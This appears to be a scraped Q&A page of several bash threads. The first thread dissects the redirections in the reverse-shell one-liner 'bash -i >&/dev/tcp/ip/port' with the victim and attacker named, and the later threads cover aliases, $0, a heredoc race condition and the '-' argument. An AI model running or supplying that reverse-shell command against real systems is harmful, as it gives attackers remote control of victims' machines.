Bash reverse shell strange behavior - linux

I tried today to understand as much as I could a command (found here) to open a reverse shell on the victim side. Here is it:
bash -i >&/dev/tcp/ip/port 0>&1
However, I didn't completely get why the first redirection is >&. I understood that /dev/tcp/ip/port is a "pseudo" file created by bash, but I didn't find the information if it has to be treated as a real file or as a file descriptor. Therefore, I tried to treat it like a real file and rewrote the bash command like this :
bash -i >/dev/tcp/ip/port 0>&1
In this case, a strange behavior happen: the reverse shell is working as expected (I can type some command on the attacker side and get the output on the attacker side too), except for one output : the bash command prompt text. So the only thing that is not printed on the attacker side but on the victim side is :
bash-4.4$
Everything else is printed as expected, i.e on the attacker side.
The last test I tried is to change the bash command like this :
bash -i >/dev/tcp/ip/port <&1
Indeed, after reading the man page of bash, it made more sense to me to use the < redirection, as as it's stated on the man page, this opens the file descriptor 1 for reading on file descriptor 0. Here, the same problem as the second command arises (everything is printed on the attacker except the bash command prompt bash-4.4$).
I also noted that redirecting stderr like :
bash -i >/dev/tcp/ip/port 2>&2 <&1
solves the problem, as if bash-4.4$ was printed on stderr...
I thus have four questions for which I cannot find an answer :
Should /dev/tcp and /dev/udp be treated as file or directly as file descriptor ? Which is equivalent to asking : should we write echo "hello" >/dev/tcp/ip/port or echo "hello" >&/dev/tcp/ip/port ?
Why does the author used 0>&1 to change stdin instead of <&1, and how is it possible that it works in the first version of the command ?
Why is this strange behavior happening with the second and third command ? How is it possible that only part of the output is redirected ? In my point of view it should either redirect everything or nothing.
Why does redirecting stderr in the last command solves the problem ? This is not done on the first command (the original one of the author) but it still works..
Thank you very much in advance for your answers ! I hope I made this post as clear as possible.

A file descriptor in bash is a number, i. e. one or more digits, so /dev/… is definitely not a file descriptor. You were mislead by the special construct >&, which unless followed by a number is not the redirection operator for duplicating an output file descriptor, but the unpreferred format for redirecting standard output and standard error.
Why the author used 0>&1 to change stdin instead of <&1, only he (or someone who can read his mind) can tell; I agree with you that it makes more sense to use the < redirection. Both versions work because &1 refers to /dev/tcp/ip/port, which can be read from as well as written to.
The behavior is not strange at all, since, as you already wrote, the prompt is printed on stderr.
Well, redirecting stderr is done on the first command by >&.

Related

Command works in terminal but not as alias in profile.d

I have a problem regarding an alias file in /etc/profile.d/. This isn't anything important. I'm just interested why it isn't working as expected.
So basically I have the file 00-alias.sh at the path mentioned above and I wanted to make a shortcut which reads a specific line of a file. So this is my code:
alias lnn='sed -n "${1}p" < "${2}"'
With that code I should be able to perform a command like
$ lnn 4 test.txt
However, this doesn't work. I simply get the error
-bash: : No such file or directory
Now I thought, ok, maybe relative paths aren't working because the file is located at the path /etc/profile.d/00-alias.sh
So I went ahead and made a new alias like
alias pwd2='echo $(pwd)'
Then updated the profile.d with
source /etc/profile.d/00-alias.sh
And just tried pwd2 but that echoed the path I was currently in. So in theory the file can be found with the command I wrote. I still tried to pass the file to my alias with absolute path like
$ lnn 4 /var/test.txt
Still same error as above.
But, if I enter the command of the alias in the terminal like
sed -n "4p" < test.txt
It works perfectly fine. No matter if I put quotes around test.txt
And here is another weird thing: If I write
alias lnn='sed -n "${1}p" < ${2}'
without the quotes around ${2} I get the error
-bash: ${2}: ambiguous redirect
In the terminal it works just fine...
So, what am I doing wrong? Does anyone have an idea on this? I'd love to know my mistake. But as I said, this isn't a real problem as I'm just curious why bash behaves like that.
Aliases in bash do not take parameters of any form. Save the pain and use a function instead.
function lnn() {
sed -n "${1}p" < "${2}"
}
Add the function to the file 00-alias.sh and source it once before calling the function from command-line.
source /etc/profile.d/00-alias.sh
lnn 4 test.txt
See more information at BashFAQ/80: How can I make an alias that takes an argument?
You can't. Aliases in bash are extremely rudimentary, and not really suitable to any serious purpose. The bash man page even says so explicitly:
An excerpt from the GNU bash man page, about aliases
.. There is no mechanism for using arguments in the replacement text. If arguments are needed, a shell function should be used.
On a side note the problem has nothing to do with relative paths (or) so, just remember aliases are not allowed in scripts. They're only allowed in interactive shells. If you're writing a script, always use a function instead.

$0 gives different results on Redhat versus Ubuntu?

I have the following script created by some self-claimed bash expert:
SCRIPT_LOCATION="$(readlink -f $0)"
SCRIPT_DIRECTORY="$(dirname ${SCRIPT_LOCATION})"
export PYTHONPATH="${PYTHONPATH}:${SCRIPT_DIRECTORY}/util"
That runs nicely on my local Ubuntu 16.04. Now I wanted to use it on our RH 7.2 servers; and there I got an error message from readlink; about being called with bad parameters.
Then I figured: on Ubuntu, $0 gives "bash"; whereas on RH, it gives "-bash".
EDIT: script is invoked as . ourscript.sh
Questions:
Any idea why that is?
When I change my script to use a hardcoded readlink -f bash the whole things works. Are there "better" ways for fixing this?
Feel free to also explain what readlink -f bash is actually doing ;-)
As the script is sourced the readlink -f $0 is pointless as it will just show you the command used to run the shell you are currently using.
To explain the difference in command lets look at the bash man page:
A login shell is one whose first character of argument zero is a -, or one started with the --login option.
When bash is invoked as an interactive login shell, or as a non-interactive shell with the --login option, it first reads and executes commands from the file /etc/profile, if that file exists. After reading that file, it looks for ~/.bash_profile, ~/.bash_login, and ~/.profile, in that order, and reads and executes commands from the first one that exists and is readable. The --noprofile option may be used when the shell is started to inhibit this behavior.
So guessing ubuntu starts with the noprofile option.
As for readlink, we can again look at the man page
-f, --canonicalize
canonicalize by following every symlink in every component of the given name recursively; all but the last component must exist
Therefore it follows symlinks to the base.
Using readlink -f with any non qualified path will result in it just appending the last arg to your current working directory which will not actually show where the script is run.
Try putting any random string instead of bash after it and will see the script is unaffected.
e.g
readlink -f dafsfdsf
Returns
/home/me/testscript/dafsfdsf

Bash Command Substitution Giving Weird Inconsistent Output

For some reasons not relevant to this question, I am running a Java server in a bash script not directly but via command substitution under a separate sub-shell, and in the background. The intent is for the subcommand to return the process id of the Java server as its standard output. The fragement in question is as follows:
launch_daemon()
{
/bin/bash <<EOF
$JAVA_HOME/bin/java $JAVA_OPTS -jar $JAR_FILE daemon $PWD/config/cl.yml <&- &
pid=\$!
echo \${pid} > $PID_FILE
echo \${pid}
EOF
}
daemon_pid=$(launch_daemon)
echo ${daemon_pid} > check.out
The Java daemon in question prints to standard error and quits if there is a problem in initialization, otherwise it closes standard out and standard err and continues on its way. Later in the script (not shown) I do a check to make sure the server process is running. Now on to the problem.
Whenever I check the $PID_FILE above, it contains the correct process id on one line.
But when I check the file check.out, it sometimes contains the correct id, other times it contains the process id repeated twice on the same line separated by a space charcater as in:
34056 34056
I am using the variable $daemon_pid in the script above later on in the script to check if the server is running, so if it contains the pid repeated twice this totally throws off the test and it incorrectly thinks the server is not running. Fiddling with the script on my server box running CentOS Linux by putting in more echo statements etc. seems to flip the behavior back to the correct one of $daemon_pid containing the process id just once, but if I think that has fixed it and check in this script to my source code repo and do a build and deploy again, I start seeing the same bad behavior.
For now I have fixed this by assuming that $daemon_pid could be bad and passing it through awk as follows:
mypid=$(echo ${daemon_pid} | awk '{ gsub(" +.*",""); print $0 }')
Then $mypid always contains the correct process id and things are fine, but needless to say I'd like to understand why it behaves the way it does. And before you ask, I have looked and looked but the Java server in question does NOT print its process id to its standard out before closing standard out.
Would really appreciate expert input.
Following the hint by #WilliamPursell, I tracked this down in the bash source code. I honestly don't know whether it is a bug or not; all I can say is that it seems like an unfortunate interaction with a questionable use case.
TL;DR: You can fix the problem by removing <&- from the script.
Closing stdin is at best questionable, not just for the reason mentioned by #JonathanLeffler ("Programs are entitled to have a standard input that's open.") but more importantly because stdin is being used by the bash process itself and closing it in the background causes a race condition.
In order to see what's going on, consider the following rather odd script, which might be called Duff's Bash Device, except that I'm not sure that even Duff would approve: (also, as presented, it's not that useful. But someone somewhere has used it in some hack. Or, if not, they will now that they see it.)
/bin/bash <<EOF
if (($1<8)); then head -n-$1 > /dev/null; fi
echo eight
echo seven
echo six
echo five
echo four
echo three
echo two
echo one
EOF
For this to work, bash and head both have to be prepared to share stdin, including sharing the file position. That means that bash needs to make sure that it flushes its read buffer (or not buffer), and head needs to make sure that it seeks back to the end of the part of the input which it uses.
(The hack only works because bash handles here-documents by copying them into a temporary file. If it used a pipe, it wouldn't be possible for head to seek backwards.)
Now, what would have happened if head had run in the background? The answer is, "just about anything is possible", because bash and head are racing to read from the same file descriptor. Running head in the background would be a really bad idea, even worse than the original hack which is at least predictable.
Now, let's go back to the actual program at hand, simplified to its essentials:
/bin/bash <<EOF
cmd <&- &
echo \$!
EOF
Line 2 of this program (cmd <&- &) forks off a separate process (to run in the background). In that process, it closes stdin and then invokes cmd.
Meanwhile, the foreground process continues reading commands from stdin (its stdin fd hasn't been closed, so that's fine), which causes it to execute the echo command.
Now here's the rub: bash knows that it needs to share stdin, so it can't just close stdin. It needs to make sure that stdin's file position is pointing to the right place, even though it may have actually read ahead a buffer's worth of input. So just before it closes stdin, it seeks backwards to the end of the current command line. [1]
If that seek happens before the foreground bash executes echo, then there is no problem. And if it happens after the foreground bash is done with the here-document, also no problem. But what if it happens while the echo is working? In that case, after the echo is done, bash will reread the echo command because stdin has been rewound, and the echo will be executed again.
And that's precisely what is happening in the OP. Sometimes, the background seek completes at just the wrong time, and causes echo \${pid} to be executed twice. In fact, it also causes echo \${pid} > $PID_FILE to execute twice, but that line is idempotent; had it been echo \${pid} >> $PID_FILE, the double execution would have been visible.
So the solution is simple: remove <&- from the server start-up line, and optionally replace it with </dev/null if you want to make sure the server can't read from stdin.
Notes:
Note 1: For those more familiar with bash source code and its expected behaviour than I am, I believe that the seek and close takes place at the end of case r_close_this: in function do_redirection_internal in redir.c, at approximately line 1093:
check_bash_input (redirector);
close_buffered_fd (redirector);
The first call does the lseek and the second one does the close. I saw the behaviour using strace -f and then searched the code for a plausible looking lseek, but I didn't go to the trouble of verifying in a debugger.

Commands work from Shell script but not from command line?

I quickly searched for this before posting, but could not find any similar posts. Let me know if they exist.
The commands being executed seem very simple. A directory listing is used as the input for a function.
The directory contains a bunch of files named "epi1_mcf_0###.nii.gz"
Command-line version (bash is running when this is executed):
fslmerge -t output_file `ls epi1_mcf_0*.nii.gz`
Shell script version:
#!/bin/bash
fslmerge -t output_file `ls epi1_mcf_0*.nii.gz`
The command-line version fails, but the shell script one works perfectly.
The error message is specific to the function, but it's included anyway.
** ERROR (nifti_image_read): failed to find header file for 'epi1_mcf_0000.nii.gz'
** ERROR: nifti_image_open(epi1_mcf_0000.nii.gz): bad header info
Error: failed to open file epi1_mcf_0000.nii.gz
Cannot open volume epi1_mcf_0000.nii.gz for reading!
I have been very frustrated with this problem (less so after I figured out that there was a way to get the command to work).
Any help would be appreciated.
(Or is the general consensus that the problem should be looked for in the "fslmerge" function?)
`ls epi1_mcf_0*.nii.gz` is better written as simply epi1_mcf_0*.nii.gz. As in:
fslmerge -t output_file epi1_mcf_0*.nii.gz
The `ls` doesn't add anything.
Note: Posted as an answer instead of comment. The Markdown-lite comment parser choked on my `` `ls epi1_mcf_0*.nii.gz` `` markup.
(I mentioned this in a comment first, but I'll make an answer since it helped!)
Do you have any shell aliases defined? (Type alias) Those will affect commands typed at the command line, but not scripts.
Linux often has ls defined as ls --color. This may affect the output since the colour codes are sent as escape codes through the regular output stream. If you use ls --color=auto it will auto-detect whether its output is a terminal or not. From man ls:
By default, color is not used to distinguish types of files. That is
equivalent to using --color=none. Using the --color option without the
optional WHEN argument is equivalent to using --color=always. With
--color=auto, color codes are output only if standard output is connected to a terminal (tty).

what does '-' stand for in bash?

What exactly are the uses of '-' in bash? I know they can be used for
cd - # to take you to the old 'present working directory'
some stream generating command | vim - # somehow vim gets the text.
My question is what exactly is - in bash? In what other contexts can I use it?
Regards
Arun
That depends on the application.
cd -
returns to the last directory you were in.
Often - stands for stdin or stdout. For example:
xmllint -
does not check an XML file but checks the XML on stdin. Sample:
xmllint - <<EOF
<root/>
EOF
The same is true for cat:
cat -
reads from stdin. A last sample where - stands for stdout:
wget -O- http://google.com
will receive google.com by HTTP and send it on stdout.
By the way: That has nothing to do with your shell (e.g. bash). It's only semantics of the called application.
- in bash has no meaning as a standalone argument (I would not go as far as to say it it does not have a meaning in shell at all - it's for example used in expansion, e.g. ls [0-9]* lists all files starting with a digit).
As far as being a standalone parameter value, bash will do absolutely nothing special with it and pass to a command as-is.
What the command does with it is up to each individual program - can be pretty much anything.
There's a commonly used convention that - argument indicates to a program that the input needs to be read from STDIN instead of a file. Again, this is merely how many programs are coded and technically has nothing to do with bash.
From tldp:
This can be done for instance using a hyphen (-) to indicate that a program should read from a pipe
This explains how your vim example gets its data.
There is no universal rule here.
According to the context it changes
It is pretty much useful when you have something to do repeatedly in two directories. Refer #4 here: http://www.thegeekstuff.com/2008/10/6-awesome-linux-cd-command-hacks-productivity-tip3-for-geeks/
In many places it means STDIN.

Resources